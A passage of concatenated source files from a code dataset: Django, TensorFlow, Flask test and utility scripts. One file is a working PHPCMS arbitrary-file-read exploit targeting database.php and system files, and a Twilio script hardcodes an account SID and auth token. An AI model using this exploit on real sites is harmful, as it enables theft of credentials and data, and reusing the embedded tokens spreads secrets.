AWS_LOCATION)","sub_path":"app/gtszrcp/settings/static_settings.py","file_name":"static_settings.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"654064486","text":"\"\"\"example_project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom app.views import IndexView, FromageView, CreateCheeseView, FromageDetailView\nfrom cheeseapi.views import FromageAPIView, FromageDetailAPIView\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n url(r'^$',IndexView.as_view(), name='index_view'),\n url(r'^cheese$',FromageView.as_view(), name=\"fromage_view\"),\n url(r'^cheese/(?P<pk>\\d+)$', FromageDetailView.as_view(), name=\"cheese_detail_view\"),\n url(r'^addcheese/$', CreateCheeseView.as_view(), name=\"create_cheese_view\"),\n url(r'^api/cheese/$', FromageAPIView.as_view(), name=\"fromage_api_view\"),\n url(r'^api/cheese/(?P<pk>\\d+)/$', FromageDetailAPIView.as_view(), name=\"fromage_detail_api_view\")\n]\n","sub_path":"example_project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"314105255","text":"\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport random\r\n\r\n\r\nclass A2CAgent():\r\n\r\n def __init__(self, name, is_train_model, sess, input_shape, action_size, lr, GAMMA, LAMBDA, max_grad_norm, ent_coef, vf_coef, clip_range, loadModel):\r\n self.sess = sess\r\n self.input_shape = input_shape\r\n self.action_size = action_size\r\n self.lr = lr\r\n self.GAMMA = GAMMA\r\n self.LAMBDA = LAMBDA\r\n self.max_grad_norm = max_grad_norm\r\n self.ent_coef = ent_coef\r\n self.vf_coef = vf_coef\r\n self.name = name\r\n self.is_train_model = is_train_model\r\n self.clip_range = clip_range\r\n\r\n self.state = tf.placeholder(tf.uint8, shape=(\r\n None, *self.input_shape), name=\"state\")\r\n self.actions = tf.placeholder(tf.uint8, shape=(None,), name=\"actions\")\r\n self.rewards = tf.placeholder(\r\n tf.float32, shape=(None,), name=\"rewards\")\r\n self.advantages = tf.placeholder(\r\n tf.float32, shape=(None,), name=\"advantages\")\r\n\r\n self.old_policy = tf.placeholder(tf.float32, shape=(\r\n None, self.action_size), name=\"old_policy\")\r\n self.old_values = tf.placeholder(\r\n tf.float32, shape=(None,), name=\"old_values\")\r\n\r\n self.episode_rewards = tf.placeholder(\r\n tf.float32, shape=(), name=\"episode_rewards\")\r\n self.max_episode_rewards = tf.placeholder(\r\n tf.float32, shape=(), name=\"max_episode_rewards\")\r\n\r\n with tf.variable_scope(self.name, reuse=tf.AUTO_REUSE):\r\n self.x_conv = tf.cast(self.state, tf.float32) / 255.0\r\n self.conv1 = tf.layers.conv2d(inputs=self.x_conv, filters=32, kernel_size=[8, 8], strides=(\r\n 4, 4), activation=tf.nn.relu, kernel_initializer=tf.contrib.layers.xavier_initializer_conv2d())\r\n self.conv2 = tf.layers.conv2d(inputs=self.conv1, filters=64, kernel_size=[4, 4], strides=(\r\n 2, 2), activation=tf.nn.relu, kernel_initializer=tf.contrib.layers.xavier_initializer_conv2d())\r\n self.conv3 = tf.layers.conv2d(inputs=self.conv2, filters=64, kernel_size=[3, 3], strides=(\r\n 1, 1), activation=tf.nn.relu, kernel_initializer=tf.contrib.layers.xavier_initializer_conv2d())\r\n\r\n self.conv_out = tf.contrib.layers.flatten(self.conv3)\r\n self.shared_dense = tf.layers.dense(\r\n self.conv_out, 512, activation=tf.nn.relu, kernel_initializer=tf.contrib.layers.xavier_initializer())\r\n\r\n self.policy_logits = tf.layers.dense(\r\n self.shared_dense, self.action_size, kernel_initializer=tf.contrib.layers.xavier_initializer())\r\n self.policy = tf.nn.softmax(self.policy_logits)\r\n\r\n self.values = tf.layers.dense(\r\n self.shared_dense, 1, kernel_initializer=tf.contrib.layers.xavier_initializer())\r\n self.local_vars = tf.trainable_variables()\r\n self.saver = tf.train.Saver(\r\n var_list=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES))\r\n\r\n if is_train_model:\r\n with tf.name_scope(\"{}_gradient\".format(self.name)):\r\n cliped_values = self.old_values + \\\r\n tf.clip_by_value(\r\n self.values - self.old_values, -self.clip_range, self.clip_range)\r\n \r\n value_loss1 = tf.square(tf.squeeze(self.values) - self.rewards)\r\n value_loss2 = tf.square(\r\n tf.squeeze(cliped_values) - self.rewards)\r\n\r\n self.value_loss = 0.5 * \\\r\n tf.reduce_mean(tf.maximum(value_loss1, value_loss2))\r\n\r\n action_one_hot = tf.one_hot(\r\n self.actions, self.action_size, dtype=tf.float32)\r\n\r\n log_policy = tf.log(tf.reduce_sum(\r\n self.policy * action_one_hot, axis=1))\r\n old_log_policy = tf.log(tf.reduce_sum(\r\n self.old_policy * action_one_hot, axis=1))\r\n\r\n ratio = tf.exp(log_policy - old_log_policy) # pnew / pold\r\n\r\n std_advantages = (self.advantages - tf.reduce_mean(self.advantages)) / (tf.math.reduce_std(self.advantages) + 1e-8)\r\n cliped_ratio = tf.clip_by_value(\r\n ratio, 1.0 - self.clip_range, 1.0 + self.clip_range)\r\n policy_loss1 = - ratio * std_advantages\r\n policy_loss2 = - cliped_ratio * std_advantages\r\n\r\n # PPO's pessimistic surrogate (L^CLIP)\r\n self.policy_loss = tf.reduce_mean(tf.maximum(policy_loss1, policy_loss2))\r\n\r\n #self.entropy = tf.reduce_mean(self.calc_entropy(self.policy_logits))\r\n \r\n self.entropy = tf.reduce_mean(tf.reduce_sum(- self.policy * tf.log(tf.clip_by_value(self.policy, 1e-7, 1)), axis=1))\r\n self.total_loss = self.vf_coef * self.value_loss + \\\r\n self.policy_loss - self.ent_coef * self.entropy\r\n\r\n tf.summary.scalar('policy_loss', self.policy_loss)\r\n tf.summary.scalar('entropy_loss', self.entropy)\r\n tf.summary.scalar('total_loss', self.total_loss)\r\n tf.summary.scalar('episode_rewards', self.episode_rewards)\r\n tf.summary.scalar('max_episode_rewards', self.max_episode_rewards)\r\n\r\n optimizer = tf.train.AdamOptimizer(learning_rate=self.lr)\r\n\r\n grads = tf.gradients(self.total_loss, self.local_vars)\r\n\r\n if self.max_grad_norm is not None:\r\n grads, _ = tf.clip_by_global_norm(\r\n grads, self.max_grad_norm)\r\n grads = list(zip(grads, self.local_vars))\r\n\r\n def l2_norm(t): return tf.sqrt(tf.reduce_sum(tf.pow(t, 2)))\r\n for gradient, variable in grads:\r\n tf.summary.histogram(\r\n \"gradients/\" + variable.name, l2_norm(gradient))\r\n tf.summary.histogram(\r\n \"variables/\" + variable.name, l2_norm(variable))\r\n\r\n self.train_model_op = optimizer.apply_gradients(grads)\r\n self.summaries_op = tf.summary.merge_all()\r\n\r\n self.sess.run(tf.initialize_variables(tf.get_collection(\r\n tf.GraphKeys.GLOBAL_VARIABLES, scope=self.name)))\r\n\r\n if loadModel:\r\n self.load_weights()\r\n\r\n def create_sync_ops(self, from_model):\r\n return [tf.assign(to_var, from_var) for (to_var, from_var) in zip(\r\n tf.trainable_variables(self.name), tf.trainable_variables(from_model.name))]\r\n\r\n def calc_entropy(self, logits):\r\n a0 = logits - tf.reduce_max(logits, axis=-1, keepdims=True)\r\n ea0 = tf.exp(a0)\r\n z0 = tf.reduce_sum(ea0, axis=-1, keepdims=True)\r\n p0 = ea0 / z0\r\n return tf.reduce_sum(p0 * (tf.log(z0) - a0), axis=-1)\r\n\r\n def save_weights(self):\r\n self.saver.save(self.sess, f\"./{self.name}.ckpt\")\r\n\r\n def load_weights(self):\r\n self.saver.restore(self.sess, f\"./{self.name}.ckpt\")\r\n\r\n def get_actions_and_values(self, state):\r\n return self.sess.run([self.policy, self.values], feed_dict={self.state: state})\r\n\r\n def get_action(self, state):\r\n return self.sess.run(self.policy, feed_dict={self.state: state})\r\n\r\n def get_value(self, state):\r\n return self.sess.run(self.values, feed_dict={self.state: state})\r\n\r\n def train(self, states, actions, rewards, advantages, old_policy, old_values):\r\n _, value_loss, policy_loss, entropy = self.sess.run([self.train_model_op, self.value_loss, self.policy_loss, self.entropy], {\r\n self.state: states, self.actions: actions, self.rewards: rewards, self.advantages: advantages, self.old_policy: old_policy, self.old_values: old_values})\r\n print(\r\n f\"critic_loss:{value_loss}, actor_loss:{policy_loss}, entropy:{entropy}\")\r\n\r\n def get_summary(self, states, actions, rewards, advantages, max_episode_rewards, episode_rewards, old_policy, old_values):\r\n summary = self.sess.run(self.summaries_op, feed_dict={\r\n self.max_episode_rewards: max_episode_rewards, self.episode_rewards: episode_rewards, self.state: states, self.actions: actions, self.rewards: rewards, self.advantages: advantages, self.old_policy: old_policy, self.old_values: old_values})\r\n return summary\r\n","sub_path":"a2c_agent.py","file_name":"a2c_agent.py","file_ext":"py","file_size_in_byte":8440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"89877174","text":"import sys\nimport unittest\nimport datetime\n\nimport bllog\nfrom bllog import LogFormatter\nfrom bllog.log_classes import LogLevel\nfrom bllog.logger import LogMessage\n\n\nclass FormatTests(unittest.TestCase):\n\n def test_date_find(self):\n fmt = 'asd {date_time:%Y} sad {}'\n formatter = LogFormatter(fmt)\n self.assertTrue(formatter.has_date)\n self.assertEqual('%Y', formatter.date_fmt_str)\n\n def test_format(self):\n test_message = LogMessage('test message', LogLevel.WARNING, 123,\n datetime.datetime(2020, 1, 1, 12, 12, 35, 112233))\n\n formatter1 = LogFormatter('[{thread_id} ]')\n self.assertEqual('[123 ]', formatter1.format(test_message))\n\n formatter2 = LogFormatter('{AS: {level} }')\n self.assertEqual('{AS: WARNING }', formatter2.format(test_message))\n\n formatter3 = LogFormatter(' || {date_time:%Y..%d} || ')\n self.assertEqual(' || 2020..01 || ', formatter3.format(test_message))\n\n formatter4 = LogFormatter('{date_time} [{level}]: {message}')\n self.assertEqual('2020-01-01 12:12:35.112233 [WARNING]: test message', formatter4.format(test_message))\n\n def test_manual_log(self):\n cstream = bllog.StreamBuilder().console().format_level_color().format_symbol_color().build()\n fstream = bllog.StreamBuilder().named_file('test_log.log').build()\n logger = bllog.LoggerBuilder().name('Test Log').streams([cstream,fstream]).build()\n\n logger.log(LogMessage('Test Trace', LogLevel.TRACE, 112233,datetime.datetime.now()))\n logger.log(LogMessage('Test Debug', LogLevel.DEBUG, 112233,datetime.datetime.now()))\n logger.log(LogMessage('Test Info', LogLevel.INFO, 112233,datetime.datetime.now()))\n logger.log(LogMessage('Test Warning', LogLevel.WARNING, 112233,datetime.datetime.now()))\n logger.log(LogMessage('Test Error', LogLevel.ERROR, 112233,datetime.datetime.now()))\n logger.log(LogMessage('Test Fatal', LogLevel.FATAL, 112233,datetime.datetime.now()))\n\n logger.trace(\"Trace Test\")\n logger.debug(\"Debug Test\")\n logger.info(\"Info Test\")\n logger.warning(\"Warning Test\")\n logger.error(\"Error Test\")\n logger.fatal(\"Fatal Test\")\n\n print('Random Print')\n sys.stderr.write('Random stderr')\n self.assertTrue(True)\n\n\nif __name__ == '__main__':\n FormatTests().test_manual_log()","sub_path":"tests/simple_tests.py","file_name":"simple_tests.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"371507996","text":"import json\n\n\ndef get_key_values(data: dict, target: str) -> list:\n \"\"\"\n Returns all values in dict depending on the key\n :param data: dict, in which values will be looked for\n :param target: value of the key\n :return: list of all found values\n \"\"\"\n temp = []\n\n def dfs_get_values(parent: object, target):\n if isinstance(parent, dict):\n for key in parent:\n if key == target:\n temp.append(parent[key])\n else:\n dfs_get_values(parent[key], target)\n if isinstance(parent, list):\n for item in parent:\n dfs_get_values(item, target)\n dfs_get_values(data, target)\n return temp\n\n\ndef get_dict_from_json(json_file_path: str) -> dict:\n \"\"\"\n Transforms json file to dict\n :param json_file_path: path to json file\n :return: transformed dictionary\n \"\"\"\n with open(json_file_path, mode='r') as f:\n data = json.load(f)\n return data\n\n\ndef analyze_dict(dct: object):\n \"\"\"\n Analyzes the dict\n :param dct: dictionary, which we want to analyze\n :return: True\n \"\"\"\n temp = [dct]\n while temp:\n sub_elem = temp[-1]\n if isinstance(sub_elem, list):\n print(\"There are available indexes in range of {}\"\n .format(len(sub_elem)))\n elif isinstance(sub_elem, dict):\n print(\"There are available keys of dict:\\n{}\"\n .format('\\n'.join([el for el in sub_elem])))\n else:\n print(sub_elem)\n key = input(\"Enter the command or the key/index value,\"\n \" which u want to look for: \")\n if key == 'PRINT':\n print(temp[-1])\n elif key == 'ESCAPE':\n print(\"Hope u enjoyed using this program...\")\n return True\n elif key == 'BACK':\n temp.pop()\n continue\n elif key.isdigit():\n temp.append(sub_elem[int(key)])\n else:\n temp.append(sub_elem[key])\n print(\"Hope u enjoyed this program\")\n\n\ndef main(path: str):\n \"\"\"\n Runs a program which is used for analysing json files\n :return: None\n \"\"\"\n dct_from_json = get_dict_from_json('form.json')\n opening_text = \"Enter the variant of realization:\\n\"\\\n + \"If u know the key and want to search\" \\\n \" for all values by this key, enter '1'\\n\" +\\\n \"If u want to search for values step by step, enter '2'\\n: \"\n var = input(opening_text)\n try:\n if var == '1':\n key = input(\"Enter the key value: \")\n print(get_key_values(dct_from_json, key))\n elif var == '2':\n commands_text = \"LIST of commands:\\n\" +\\\n \"1) to print the current object,\" \\\n \" please type 'PRINT'\\n\" +\\\n \"2) to get back, please type 'BACK'\\n\" + \\\n \"3) to escape from program, type 'ESCAPE'\\n\"\n print(commands_text)\n analyze_dict(dct_from_json)\n else:\n print(\"There is no more variants of realization, sorry\")\n except (KeyError, ValueError, IndexError):\n print(\"Enter the true value of key/index!\")\n\n\nif __name__ == \"__main__\":\n main('form.json')","sub_path":"analyze_json_file.py","file_name":"analyze_json_file.py","file_ext":"py","file_size_in_byte":3310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"120620487","text":"import re\n\ndef ParseModelAndRev(text):\n\tm = re.match(r\"^0x[a-z0-9]+: ([0-9a-f]+) ([0-9a-f]+)$\", text)\n\tif not m:\n\t\traise AttributeError(\"Model/revision unparseable: got %s\" % text)\n\n\tmodel_id = m.group(1)\n\tassert len(model_id) == 4\n\tmodel_id = model_id[1:] # first char \"reserved\"\n\trevision_id = m.group(2)\n\tmodel_name = {\n\t\t\"422\": \"STM32F303xB/C or STM32F358\",\n\t\t\"438\": \"STM32F303x6/8 or STM32F328\",\n\t\t\"446\": \"STM32F303xD/E or STM32F398xE\",\n\t}.get(model_id)\n\tif not model_name:\n\t\traise AttributeError(\"Unknown model id: %s\" % model_id)\n\n\trevision_name = {\n\t\t\"1001\": \"Z\",\n\t\t\"1003\": \"Y\",\n\t}.get(revision_id)\n\tif not revision_name:\n\t\traise AttributeError(\"Unknown revision id: %s\" % revision_id)\n\n\treturn model_name, revision_name\n\n\ndef ParseUUID(text):\n\tm = re.match(r\"^0x[a-z0-9]+: ([0-9a-f]+) ([0-9a-f]+)$\", text)\n\tif not m:\n\t\traise AttributeError(\"Model/revision unparseable: got %s\" % text)\n\tuid = m.group(1) + m.group(2)\n\treturn uid\n\ndef PickNodeNumber(existing, uid):\n\tif uid in existing:\n\t\tnum = existing[uid]\n\t\t# print(\"Device already known as node #%s\" % num)\n\t\treturn num, False\n\telse:\n\t\ttaken_numbers = set(existing.values())\n\t\tfor i in range(250):\n\t\t\tif i not in taken_numbers:\n\t\t\t\t# print('Assigning new number %s' % i)\n\t\t\t\treturn i, True\n\t\traise ValueError('Failed to assign new node number')\n\n\nwith open('device_identifiers.output', 'r') as f:\n\tlines = f.readlines()\n\tif len(lines) < 2: raise AttributeError(\"File too short\")\n\n\tmodel_name, revision_name = ParseModelAndRev(lines[0].strip())\n\tuid = ParseUUID(lines[1].strip())\n\n# print(\"MCU: %s, rev %s\" % (model_name, revision_name))\n# print(\"UID:\", uid)\n\nDB_FILE = 'device_database.txt'\n\t\t\nwith open(DB_FILE, 'r') as f:\n\texisting = {}\n\tfor l in f.readlines():\n\t\tuid, node_number = l.split(' ')\n\t\texisting[uid] = node_number\n\nnumber, is_new = PickNodeNumber(existing, uid)\nif is_new:\n\twith open(DB_FILE, 'a') as f:\n\t\tf.write('%s %s\\n' % (uid, number))\n\nprint(number)","sub_path":"custom_applications/crossing_controller/targets/freertos.armv7m.st-stm32f303re-nucleo/extract_node_uuid.py","file_name":"extract_node_uuid.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"606052298","text":"#!/usr/bin/python\nimport socket\nimport json\nimport os\n\nDN=1\nHOST='localhost'\nPORT=12900+DN\nTX_PORT=12800+DN\n\n# Connect to AVS4000 API socket\nsock=socket.socket(socket.AF_INET,socket.SOCK_STREAM);\nsock.connect((HOST,PORT));\n\n# Create REQ\nP={}; # Set REQ Map\nTX={}; # TX Group Map\nTXD={}; # TXDATA Group Map\nTX[\"sampleRate\"]=15e6 # TX Sample Rate\nTXD[\"conEnable\"]=True; # enable RX Data Connection\nTXD[\"conType\"]=\"tcp\"; # Specify to use TCP\nTXD[\"conPort\"]=TX_PORT; # Specify TCP Port to listen on\nTXD[\"useV49\"]=False; # Receive Raw IQ Data\nTXD[\"run\"]=True; # Start the stream\nP[\"tx\"]=TX; # Add TX Group Map to REQ\nP[\"txdata\"]=TXD; # Add TXDATA Group Map to REQ\n\nREQ=['set',P]; # Create REQ for SET Command\n\nsock.send(json.dumps(REQ)); # Convert REQ to JSON and send on socket\nstr=sock.recv(8192); # Receive the RSP\nRSP=json.loads(str); # Parse JSON to Python list\nprint (RSP); # Print the RSP\n\n# Use SOCAT utitiltiy to connect to TCP TX Data Socket\n# read data from file 'tx.out'.\nos.system(\"socat -u FILE:tx.out TCP:localhost:%d &\"%(TX_PORT))\n","sub_path":"utilities/starttx.py","file_name":"starttx.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"39983952","text":"# coding: utf-8\n\nimport sys\nimport requests\nimport re\n\ndef poc(target,filepath):\n\n print('[*]Trying to get cookie_siteid ')\n url = target +'index.php?m=wap&c=index&a=init&siteid=1'\n s = requests.Session()\n r = s.get(url)\n if('set-cookie' in r.headers):\n cookie_siteid =r.headers['set-cookie']\n cookie_siteid = cookie_siteid[cookie_siteid.index('=')+1:]\n print('[+]cookie_siteid = '+cookie_siteid)\n else:\n print('[-]Can not get cookie_siteid ')\n sys.exit()\n\n print('[*]Trying to get att_json ')\n #use < to escape php strip\n # filepath = filepath.replace('/','%2f')\n url = target + '/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id%3D1%26m%3D1%26f%3D'+filepath+'%253C%26modelid%3D1%26catid%3D1%26s%3D%26i%3D1%26d%3D1%26'\n post_data = {\n 'userid_flash':cookie_siteid\n }\n r = s.post(url,post_data)\n for cookie in s.cookies:\n if '_att_json' in cookie.name:\n cookie_att_json = cookie.value\n if('cookie_att_json' in vars()):\n print('[+]cookie_att_json = '+cookie_att_json)\n else:\n print('[-]Can not get cookie_att_json ')\n sys.exit()\n\n print('[*]Trying to get download link ')\n url = target + 'index.php?m=content&c=down&a_k=' + cookie_att_json\n # print(url)\n r = s.get(url)\n if 'm=content&c=down&a=download&a_k=' in r.text:\n # print(r.text)\n link_rule = r'<a href=\"(.*?)\"'\n link = re.findall(link_rule,r.text)\n downloadurl = target+'index.php'+link[0]\n print('[+]download link = '+downloadurl)\n else:\n return False\n\n r = s.get(downloadurl)\n print(r.text)\n\nif __name__ == \"__main__\":\n ##适用条件windows下\n #V9.6.1以前 ./caches/configs/system.ph\n #V9.6.2增加..等路径限制\n #c:Windows/System32/drivers/etc/hosts #绕过\"..\"及其他的路径限制\n #c:Windows/Repair/sam\n #./caches/configs/database.php/ #绕过php文件格式的限制,特定PHP版本可成功\n\n poc('http://192.168.66.38:82/','./caches/configs/database.php/')","sub_path":"PHPCMS/phpcms_downfile.py","file_name":"phpcms_downfile.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"589326511","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#pip install twilio\nfrom twilio.rest import Client\n# Your Account SID from twilio.com/console\naccount_sid = \"ACd5242d06de06c0cef18e4f6efc3727ee\"\n# Your Auth Token from twilio.com/console\nauth_token = \"632bd339556b7d0cd96fabc7260dbdfe\"\nclient = Client(account_sid, auth_token)\nmessage = client.messages.create(\n# 这里中国的号码前面需要加86\nto=\"+86 189 5813 2148\",\nfrom_=\"+12053509575\",\nbody=\"hi!this is a test message\") #body内容不能是中文,不然无法接收!\nprint(message.sid)\nprint(\"OKOK!!\")","sub_path":"创建新虚机/发送短信.py","file_name":"发送短信.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"265334141","text":"import logging\nimport os\nfrom typing import Callable\n\nimport django.dispatch\nimport psutil\nfrom django.apps import AppConfig\nfrom django.db import DatabaseError\nfrom django.db.models.signals import post_save, pre_delete\nfrom django.dispatch import receiver\nfrom django.utils.translation import ugettext_lazy as _\n\nlogger = logging.getLogger(__name__)\nf_none = lambda *args, **kwargs: None\n\n# sender - Book model\n# book - Book instance\n# lang - Language instance or lang code\n# source - Model which cause book update\nbook_changed = django.dispatch.Signal(providing_args=[\"book\", \"lang\", \"source\"])\n\n\nclass BooksConfig(AppConfig):\n name = 'books'\n verbose_name = _(\"Книги\")\n\n def get_run_type(self):\n \"\"\"\n Get type of django instance\n\n :return: server | <manage command> | <celery command>\n \"\"\"\n p = psutil.Process(os.getpid())\n cmdline = p.cmdline()\n if cmdline[0].endswith(\"wsgi\"):\n return \"server\"\n if cmdline[1].endswith(\"manage.py\"):\n if cmdline[2] == \"runserver\":\n return \"server\"\n return cmdline[2].strip()\n if cmdline[1].endswith(\"celery\"):\n return cmdline[2]\n return None\n\n def ready(self):\n from books.tasks import update_book\n from books.validators import BookValidator\n\n Book = self.get_model('Book')\n Image = self.get_model('Image')\n TextFragment = self.get_model('TextFragment')\n BookLanguage = self.get_model('BookLanguage')\n\n @receiver(book_changed, weak=False, dispatch_uid=\"on_book_changed\")\n def on_book_changed(sender, book, lang, source, **kwargs):\n logger.info(f\"<Signal (book_changed) sender='{sender}' book='{book}' lang='{lang}'>\")\n if book is None:\n return\n if lang:\n lang_code = lang if isinstance(lang, str) else lang.code\n book_lang = BookLanguage.objects.get(book=book, lang__code=lang_code)\n if not book_lang.hidden:\n update_book.delay(book.id, lang_code)\n else:\n for code in book.languages.filter(booklanguage__hidden=False).values_list(\"code\", flat=True):\n update_book.delay(book.id, code)\n\n run_type = self.get_run_type()\n\n # Enable signals and cache only on wsgi and runserver\n if run_type == \"server\":\n self.connect(\n Book,\n signals=(post_save,),\n book_getter=lambda self: self,\n lang_getter=f_none\n )\n self.connect(\n Image,\n book_getter=lambda self: self.book,\n lang_getter=f_none\n )\n self.connect(\n TextFragment,\n book_getter=lambda self: self.book,\n lang_getter=lambda self: self.lang\n )\n\n # Initialize cache\n try:\n for book in Book.objects.all():\n for book_lang in book.book_languages.all():\n code = book_lang.lang.code\n book_lang.validation_errors = [error.to_json() for error in BookValidator(book, code)]\n book_lang.save()\n msg = f'Book \"{book.get_title(code)}\" ({code}) validated.' \\\n f' {len(book_lang.validation_errors)} errors found.'\n if book_lang.validation_errors:\n logger.warning(msg)\n else:\n logger.info(msg)\n\n update_book.delay(book.id, code, keep_timestamp=True)\n except DatabaseError:\n pass\n\n def connect(\n self, model,\n book_getter: Callable[[object], object], lang_getter: Callable[[object], object],\n condition: Callable[[object], bool] = None, signals=(post_save, pre_delete)\n ):\n Book = self.get_model('Book')\n\n @receiver(signals, sender=model, weak=False, dispatch_uid=f\"book_update:{model._meta.model_name}:on_change\")\n def on_change(sender, instance, *args, **kwargs):\n logger.info(f\"<Signal {signals}> sender='{sender}' instance='{instance}'\")\n if not (condition is None or condition(instance)):\n return\n book = book_getter(instance)\n if book:\n lang = lang_getter(instance)\n book_changed.send(sender=Book, book=book, lang=lang, source=model)\n","sub_path":"src/books/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"563929239","text":"import sys\nfrom optparse import OptionParser\nimport json\n\n\ndef trans(number):\n return str(number)\n\n\ndef load_json(input_file_name):\n with open(input_file_name, 'rU') as f:\n data = json.load(f)\n return map(trans, data['fields']['target-field'])\n\n\ndef dump_json(output_file_name, data):\n with open(output_file_name, 'w') as f:\n json.dump(data, f)\n\n\nif __name__ == \"__main__\":\n optparser = OptionParser()\n optparser.add_option('-f', '--inputFile',\n dest='input',\n help='filename containing json for input',\n default=None)\n optparser.add_option('-o', '--outputFile',\n dest='output',\n help='filename containing json for output',\n default=None)\n (options, args) = optparser.parse_args()\n if options.input is None:\n print('No dataset filename specified, system with exit\\n')\n sys.exit('System will exit')\n if options.output is None:\n print('No dataset filename specified, system with exit\\n')\n sys.exit('System will exit')\n data = dict()\n data['transed-target-fields'] = load_json(options.input)\n dump_json(options.output, data)","sub_path":"runnable/number2string.py","file_name":"number2string.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"128503851","text":"# Test cases can be run with:\n# nosetests\n# coverage report -m\n\n\"\"\" Test cases for the Customer Service \"\"\"\nimport os\nimport logging\nimport unittest\nimport json\nfrom mock import MagicMock, patch\nfrom flask_api import status # HTTP Status Codes\nfrom app.models import Customer\n\nfrom app import server, db\nimport app.server as server\n\n# from nose.tools import set_trace\n\nDATABASE_URI = os.getenv('DATABASE_URI', None)\n######################################################################\n# T E S T C A S E S\n######################################################################\nclass TestCustomerServer(unittest.TestCase):\n \"\"\" Customer Server Tests \"\"\"\n\n @classmethod\n def setUpClass(cls):\n \"\"\" Run once before all tests \"\"\"\n server.app.debug = False\n server.initialize_logging(logging.INFO)\n # Set up the test database\n if DATABASE_URI:\n server.app.config['SQLALCHEMY_DATABASE_URI'] = DATABASE_URI\n\n\n @classmethod\n def tearDownClass(cls):\n pass\n\n def setUp(self):\n server.init_db(reset=True)\n server.Customer(firstname = 'fido', lastname = 'dog').save()\n server.Customer(firstname = 'kitty', lastname = 'cat').save()\n self.app = server.app.test_client()\n\n def tearDown(self):\n \"\"\" Runs after each test \"\"\"\n db.session.close_all()\n\n def test_index(self):\n \"\"\" Test the Home Page \"\"\"\n resp = self.app.get('/')\n self.assertEqual(resp.status_code, status.HTTP_200_OK)\n self.assertEqual(resp.content_type, 'text/html; charset=utf-8')\n\n def test_get_customer_list(self):\n \"\"\" Get a list of Customers \"\"\"\n resp = self.app.get('/customers')\n self.assertEqual(resp.status_code, status.HTTP_200_OK)\n data = json.loads(resp.data)\n self.assertEqual(len(data), 2)\n Customer.remove_all()\n resp = self.app.get('/customers')\n self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)\n\n def test_get_customer(self):\n \"\"\" Get one Customer \"\"\"\n resp = self.app.get('/customers/2')\n self.assertEqual(resp.status_code, status.HTTP_200_OK)\n data = json.loads(resp.data)\n self.assertEqual(data['firstname'], 'kitty')\n\n def test_get_customer_not_found(self):\n \"\"\" Get a Customer thats not found \"\"\"\n resp = self.app.get('/customers/0')\n self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)\n\n def test_create_customer(self):\n \"\"\" Create a Customer \"\"\"\n # save the current number of customers for later comparrison\n customer_count = self.get_customer_count()\n # add a new customer\n new_customer = {'firstname': 'sammy', 'lastname': 'snake'}\n data = json.dumps(new_customer)\n resp = self.app.post('/customers', data=data, content_type='application/json')\n self.assertEqual(resp.status_code, status.HTTP_201_CREATED)\n # Make sure location header is set\n location = resp.headers.get('Location', None)\n self.assertIsNotNone(location)\n # Check the data is correct\n new_json = json.loads(resp.data)\n self.assertEqual(new_json['firstname'], 'sammy')\n # check that count has gone up and includes sammy\n resp = self.app.get('/customers')\n data = json.loads(resp.data)\n self.assertEqual(resp.status_code, status.HTTP_200_OK)\n self.assertEqual(len(data), customer_count + 1)\n self.assertIn(new_json, data)\n\n def test_update_customer(self):\n \"\"\" Update a Customer \"\"\"\n new_kitty = {'firstname': 'kitty', 'lastname': 'tabby'}\n data = json.dumps(new_kitty)\n resp = self.app.put('/customers/2', data=data, content_type='application/json')\n self.assertEqual(resp.status_code, status.HTTP_200_OK)\n resp = self.app.get('/customers/2', content_type='application/json')\n self.assertEqual(resp.status_code, status.HTTP_200_OK)\n new_json = json.loads(resp.data)\n self.assertEqual(new_json['lastname'], 'tabby')\n\n def test_update_customer_with_invalid_credit(self):\n \"\"\" Update a Customer with invalid credit \"\"\"\n new_kitty = {'firstname': 'kitty', 'lastname': 'tabby', 'valid': True,'credit_level': -1}\n data = json.dumps(new_kitty)\n resp = self.app.put('/customers/2', data=data, content_type='application/json')\n 